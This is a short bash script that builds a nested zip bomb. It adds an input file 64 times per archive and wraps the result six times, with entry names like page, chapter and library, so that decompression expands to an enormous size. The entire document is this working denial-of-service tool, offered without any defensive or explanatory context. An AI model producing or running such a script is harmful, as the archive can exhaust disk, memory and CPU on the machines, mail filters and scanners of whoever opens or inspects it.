#!/bin/bash # This sctipt takes a inputfile and creates a zip bomb with it COUNTS="64" PREFIXLIST="page chapter book shelf floor library" #returns the fileextention of a file function getExt { extension="${1##*.}" if [ "$extension" == "$1" ]; then printf "" else printf ".$extension" fi } function add { # $1 origfile $2 zipfile $3 inzipname #add file to archive zip -9 -q "$2" "$1" #rename printf "@ $1\n@=$3\n" | zipnote -w "$2" } function pack { # $1 prefix $2 count $3 outputzipfile $4inputfile ext=$(getExt "$4") for (( c=0; c<$2; c++ )); do add "$4" "$3" "$1$c$ext" done } input="$1" for pref in $PREFIXLIST; do echo "create a $pref" pack "$pref" "$COUNTS" "tmp2.zip" "$input" mv "tmp2.zip" "tmp.zip" input="tmp.zip" done